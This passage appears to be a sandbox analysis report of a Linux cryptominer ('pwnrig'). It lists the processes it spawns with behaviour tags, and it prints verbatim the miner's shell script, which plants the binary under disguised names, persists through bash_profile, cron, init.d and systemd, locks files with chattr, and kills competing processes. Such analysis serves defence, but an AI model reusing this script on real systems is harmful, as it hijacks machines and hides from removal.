/etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"
  2⤵
  - Writes file to tmp directory
  PID:3905
- - /usr/bin/id
    id -u
    3⤵
    PID:3906
- - /usr/bin/id
    id -u
    3⤵
    PID:3907
- - /usr/bin/chattr
    chattr -i -a /bin/bprofr "~/.bash_profile"
    3⤵
    - Attempts to change immutable files
    PID:3908
- - /usr/bin/rm
    rm -rf /bin/bprofr
    3⤵
    PID:3909
- - /usr/bin/sed
    sed -i /bprofr/d "~/.bash_profile"
    3⤵
    PID:3910
- - /usr/bin/cp
    cp -f -r -- /tmp/service-agent /bin/bprofr
    3⤵
    - Writes file to system bin folder
    PID:3911
- - /usr/bin/id
    id -u
    3⤵
    PID:3912
- - /usr/bin/chattr
    chattr +i +a /bin/bprofr "~/.bash_profile"
    3⤵
    PID:3913
- - /usr/bin/mkdir
    mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly
    3⤵
    PID:3914
- - /usr/bin/chattr
    chattr -i -a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
    3⤵
    PID:3915
- - /usr/bin/rm
    rm -rf /bin/crondr
    3⤵
    PID:3916
- - /usr/bin/cp
    cp -f -r -- /tmp/service-agent /bin/crondr
    3⤵
    - Writes file to system bin folder
    PID:3917
- - /usr/bin/tee
    tee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig
    3⤵
    - Creates/modifies Cron job
    PID:3919
- - /usr/bin/sed
    sed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig
    3⤵
    - Creates/modifies Cron job
    PID:3920
- - /usr/bin/chmod
    chmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
    3⤵
    PID:3921
- - /usr/bin/chattr
    chattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
    3⤵
    PID:3922
- - /usr/bin/which
    which chkconfig
    3⤵
    PID:3923
- - /usr/bin/which
    which update-rc.d
    3⤵
    PID:3924
- - /usr/bin/chattr
    chattr -i -a /etc/init.d/pwnrig /bin/initdr
    3⤵
    PID:3925
- - /usr/sbin/update-rc.d
    update-rc.d -f pwnrig disable
    3⤵
    - Flushes firewall rules
    PID:3926
  - - /usr/local/sbin/systemctl
      systemctl --quiet disable pwnrig
      4⤵
      PID:3927
  - - /usr/local/bin/systemctl
      systemctl --quiet disable pwnrig
      4⤵
      PID:3927
  - - /usr/sbin/systemctl
      systemctl --quiet disable pwnrig
      4⤵
      PID:3927
  - - /usr/bin/systemctl
      systemctl --quiet disable pwnrig
      4⤵
      Reads EFI boot settings
      PID:3927
  - - /usr/local/sbin/systemctl
      systemctl daemon-reload
      4⤵
      PID:3954
  - - /usr/local/bin/systemctl
      systemctl daemon-reload
      4⤵
      PID:3954
  - - /usr/sbin/systemctl
      systemctl daemon-reload
      4⤵
      PID:3954
  - - /usr/bin/systemctl
      systemctl daemon-reload
      4⤵
      Reads EFI boot settings
      PID:3954
- - /usr/sbin/update-rc.d
    update-rc.d -f pwnrig remove
    3⤵
    PID:3980
  - - /usr/local/sbin/systemctl
      systemctl daemon-reload
      4⤵
      PID:3981
  - - /usr/local/bin/systemctl
      systemctl daemon-reload
      4⤵
      PID:3981
  - - /usr/sbin/systemctl
      systemctl daemon-reload
      4⤵
      PID:3981
  - - /usr/bin/systemctl
      systemctl daemon-reload
      4⤵
      Reads EFI boot settings
      PID:3981
- - /usr/bin/rm
    rm -rf /bin/initdr
    3⤵
    PID:4007
- - /usr/bin/cp
    cp -f -r -- /tmp/service-agent /bin/initdr
    3⤵
    - Writes file to system bin folder
    PID:4008
- - /usr/bin/tee
    tee /etc/init.d/pwnrig
    3⤵
    - Modifies init.d
    PID:4010
- - /usr/bin/chattr
    chattr +i +a /etc/init.d/pwnrig /bin/initdr
    3⤵
    PID:4068
- - /usr/bin/which
    which systemctl
    3⤵
    PID:4069
- - /usr/bin/chattr
    chattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr
    3⤵
    PID:4070
- - /usr/bin/rm
    rm -rf /bin/sysdr
    3⤵
    PID:4071
- - /usr/bin/cp
    cp -f -r -- /tmp/service-agent /bin/sysdr
    3⤵
    - Writes file to system bin folder
    PID:4072
- - /usr/bin/tee
    tee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service
    3⤵
    - Modifies systemd
    PID:4074
- - /usr/bin/sed
    sed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service
    3⤵
    PID:4075
- - /usr/bin/chattr
    chattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr
    3⤵
    - Attempts to change immutable files
    PID:4076
- - /usr/bin/systemctl
    systemctl enable pwnrige.service
    3⤵
    - Reads EFI boot settings
    PID:4077
- - /usr/bin/systemctl
    systemctl enable pwnrigl.service
    3⤵
    - Reads EFI boot settings
    PID:4103
- - /usr/bin/systemctl
    systemctl daemon-reload
    3⤵
    - Reads EFI boot settings
    PID:4129
- - /usr/bin/systemctl
    systemctl reload-or-restart pwnrige.service
    3⤵
    - Reads EFI boot settings
    PID:4155

/usr/bin/hostname
hostname -I
1⤵
- Attempts to change immutable files
PID:3870

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:3872

/usr/bin/awk
awk "{print \"-\"\$2}"
1⤵
PID:3877

/usr/bin/head
head -n 1
1⤵
PID:3876

/usr/bin/grep
grep "Port "
1⤵
PID:3875

/usr/bin/cat
cat /etc/ssh/sshd_config
1⤵
PID:3874

/usr/bin/sed
sed -e "s/\$//"
1⤵
PID:3886

/usr/bin/sed
sed -e "s/^ *//"
1⤵
PID:3885

/usr/bin/cut
cut -d: -f2
1⤵
PID:3884

/usr/bin/grep
grep -m 1 "model name" /proc/cpuinfo
1⤵
- Checks CPU configuration
PID:3883

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:3889

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:3892

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:3895

/tmp/service-agent
/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d
1⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:4212
- /bin/sh
  sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
  2⤵
  PID:4236
- - /usr/bin/whoami
    whoami
    3⤵
    PID:4247
- - /usr/bin/hostname
    hostname
    3⤵
    PID:4248
- - /usr/bin/grep
    grep -c "^processor" /proc/cpuinfo
    3⤵
    - Checks CPU configuration
    PID:4249
- /bin/sh
  sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
  2⤵
  PID:4265
- - /usr/bin/awk
    awk "/[zZ]/ && !a[\$2]++ {print \$2}"
    3⤵
    PID:4267
- - /usr/bin/ps
    ps -A "-ostat,ppid"
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:4266
- - /usr/bin/id
    id -u
    3⤵
    PID:4269
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:4272
- - /usr/bin/grep
    grep /etc/cron
    3⤵
    PID:4271
- - /usr/bin/ps
    ps x
    3⤵
    - Reads runtime system information
    PID:4270
- /bin/sh
  sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
  2⤵
  PID:4274
- - /usr/bin/id
    id -u
    3⤵
    PID:4275
- - /usr/bin/awk
    awk "{if(\$3>30.0) print \$2}"
    3⤵
    PID:4280
- - /usr/bin/grep
    grep -v /usr/sbin/httpd
    3⤵
    PID:4279
- - /usr/bin/grep
    grep -v -- "-bash[[:space:]]*\$"
    3⤵
    PID:4278
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:4277
- - /usr/bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:4276
- /bin/sh
  sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"
  2⤵
  PID:4282
- - /usr/bin/id
    id -u
    3⤵
    PID:4283

/usr/bin/hostname
hostname -I
1⤵
PID:4239

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:4241

/usr/bin/awk
awk "{print \"-\"\$2}"
1⤵
PID:4246

/usr/bin/head
head -n 1
1⤵
PID:4245

/usr/bin/grep
grep "Port "
1⤵
PID:4244

/usr/bin/cat
cat /etc/ssh/sshd_config
1⤵
PID:4243

/usr/bin/sed
sed -e "s/\$//"
1⤵
PID:4255

/usr/bin/sed
sed -e "s/^ *//"
1⤵
PID:4254

/usr/bin/cut
cut -d: -f2
1⤵
PID:4253

/usr/bin/grep
grep -m 1 "model name" /proc/cpuinfo
1⤵
- Checks CPU configuration
PID:4252

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:4258

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:4261

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:4264

/usr/bin/wc
wc -l
1⤵
PID:4289

/usr/bin/awk
awk "{if(\$3>30.0) print \$2}"
1⤵
PID:4288

/usr/bin/grep
grep -- "-bash[[:space:]]*\$"
1⤵
PID:4287

/usr/bin/grep
grep -v grep
1⤵
PID:4286

/usr/bin/ps
ps aux
1⤵
PID:4285

/usr/bin/crontab
crontab -r
1⤵
PID:4290

/usr/bin/pkill
pkill -f .klibsystem5
1⤵
PID:4291

/usr/bin/pkill
pkill -f .klibsystem4
1⤵
- Reads CPU attributes
PID:4292

/usr/bin/bash
bash -c "echo \"* * * * * /tmp/.klibsystem5 >/dev/null 2>&1\" | crontab -"
1⤵
PID:4293
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:4295

/usr/bin/chattr
chattr -ia /etc/cron.d/.lib-knlib4
1⤵
PID:4296

/usr/bin/chattr
chattr +ia /etc/cron.d/.lib-knlib4
1⤵
PID:4297

/usr/bin/chattr
chattr -ia /var/spool/cron/.lib-knlib4
1⤵
- Attempts to change immutable files
PID:4298

/usr/bin/chattr
chattr +ia /var/spool/cron/.lib-knlib4
1⤵
PID:4299

/usr/bin/chattr
chattr -ia /etc/cron.hourly/.lib-knlib4
1⤵
PID:4300

/usr/bin/chattr
chattr +ia /etc/cron.hourly/.lib-knlib4
1⤵
PID:4301

/usr/bin/chattr
chattr -ia /etc/cron.daily/.lib-knlib4
1⤵
PID:4302

/usr/bin/chattr
chattr +ia /etc/cron.daily/.lib-knlib4
1⤵
PID:4303

/usr/bin/chattr
chattr -ia /etc/cron.weekly/.lib-knlib4
1⤵
PID:4304

/usr/bin/chattr
chattr +ia /etc/cron.weekly/.lib-knlib4
1⤵
PID:4305

/usr/bin/chattr
chattr -ia /etc/cron.monthly/.lib-knlib4
1⤵
PID:4306

/usr/bin/chattr
chattr +ia /etc/cron.monthly/.lib-knlib4
1⤵
- Attempts to change immutable files
PID:4307

/usr/bin/chattr
chattr -ia /etc/anacrontab
1⤵
PID:4308

/usr/bin/chattr
chattr +ia /etc/anacrontab
1⤵
- Attempts to change immutable files
PID:4309

/tmp/sys-helper
/tmp/sys-helper
1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:4310

/tmp/service-agent
/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn
1⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
PID:4311
- /bin/sh
  sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
  2⤵
  PID:4312
- - /usr/bin/whoami
    whoami
    3⤵
    PID:4323
- - /usr/bin/hostname
    hostname
    3⤵
    PID:4324
- - /usr/bin/grep
    grep -c "^processor" /proc/cpuinfo
    3⤵
    - Checks CPU configuration
    PID:4325
- /bin/sh
  sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
  2⤵
  PID:4341
- - /usr/bin/awk
    awk "/[zZ]/ && !a[\$2]++ {print \$2}"
    3⤵
    PID:4343
- - /usr/bin/ps
    ps -A "-ostat,ppid"
    3⤵
    PID:4342
- - /usr/bin/id
    id -u
    3⤵
    PID:4345
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:4348
- - /usr/bin/grep
    grep /etc/cron
    3⤵
    PID:4347
- - /usr/bin/ps
    ps x
    3⤵
    - Reads runtime system information
    PID:4346
- /bin/sh
  sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"
  2⤵
  - Writes file to tmp directory
  PID:4350
- - /usr/bin/id
    id -u
    3⤵
    PID:4351
- - /usr/bin/id
    id -u
    3⤵
    PID:4352
- - /usr/bin/chattr
    chattr -i -a /bin/bprofr "~/.bash_profile"
    3⤵
    PID:4353
- - /usr/bin/rm
    rm -rf /bin/bprofr
    3⤵
    PID:4354
- - /usr/bin/sed
    sed -i /bprofr/d "~/.bash_profile"
    3⤵
    PID:4355
- - /usr/bin/cp
    cp -f -r -- /tmp/service-agent /bin/bprofr
    3⤵
    - Writes file to system bin folder
    PID:4356
- - /usr/bin/id
    id -u
    3⤵
    PID:4357
- - /usr/bin/chattr
    chattr +i +a /bin/bprofr "~/.bash_profile"
    3⤵
    PID:4358
- - /usr/bin/mkdir
    mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly
    3⤵
    PID:4359
- - /usr/bin/chattr
    chattr -i -a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
    3⤵
    PID:4360
- - /usr/bin/rm
    rm -rf /bin/crondr
    3⤵
    PID:4361
- - /usr/bin/cp
    cp -f -r -- /tmp/service-agent /bin/crondr
    3⤵
    - Writes file to system bin folder
    PID:4362
- - /usr/bin/tee
    tee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig
    3⤵
    - Creates/modifies Cron job
    PID:4364
- - /usr/bin/sed
    sed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig
    3⤵
    - Creates/modifies Cron job
    PID:4365
- - /usr/bin/chmod
    chmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
    3⤵
    PID:4366
- - /usr/bin/chattr
    chattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
    3⤵
    PID:4367
- - /usr/bin/which
    which chkconfig
    3⤵
    PID:4368
- - /usr/bin/which
    which update-rc.d
    3⤵
    PID:4369
- - /usr/bin/chattr
    chattr -i -a /etc/init.d/pwnrig /bin/initdr
    3⤵
    PID:4370
- - /usr/sbin/update-rc.d
    update-rc.d -f pwnrig disable
    3⤵
    PID:4371
  - - /usr/local/sbin/systemctl
      systemctl --quiet disable pwnrig
      4⤵
      PID:4372
  - - /usr/local/bin/systemctl
      systemctl --quiet disable pwnrig
      4⤵
      PID:4372
  - - /usr/sbin/systemctl
      systemctl --quiet disable pwnrig
      4⤵
      PID:4372
  - - /usr/bin/systemctl
      systemctl --quiet disable pwnrig
      4⤵
      PID:4372
  - - /usr/local/sbin/systemctl
      systemctl daemon-reload
      4⤵
      PID:4398
  - - /usr/local/bin/systemctl
      systemctl daemon-reload
      4⤵
      PID:4398
  - - /usr/sbin/systemctl
      systemctl daemon-reload
      4⤵
      PID:4398
  - - /usr/bin/systemctl
      systemctl daemon-reload
      4⤵
      Reads EFI boot settings
      PID:4398
- - /usr/sbin/update-rc.d
    update-rc.d -f pwnrig remove
    3⤵
    PID:4424
  - - /usr/local/sbin/systemctl
      systemctl daemon-reload
      4⤵
      PID:4425
  - - /usr/local/bin/systemctl
      systemctl daemon-reload
      4⤵
      PID:4425
  - - /usr/sbin/systemctl
      systemctl daemon-reload
      4⤵
      PID:4425
  - - /usr/bin/systemctl
      systemctl daemon-reload
      4⤵
      Reads EFI boot settings
      PID:4425
- - /usr/bin/rm
    rm -rf /bin/initdr
    3⤵
    PID:4451
- - /usr/bin/cp
    cp -f -r -- /tmp/service-agent /bin/initdr
    3⤵
    - Writes file to system bin folder
    PID:4452
- - /usr/bin/tee
    tee /etc/init.d/pwnrig
    3⤵
    - Modifies init.d
    PID:4454
- - /usr/bin/sed
    sed -i "1 s/-e //" /etc/init.d/pwnrig
    3⤵
    - Modifies init.d
    PID:4455
- - /usr/bin/chmod
    chmod +x /etc/init.d/pwnrig /bin/initdr
    3⤵
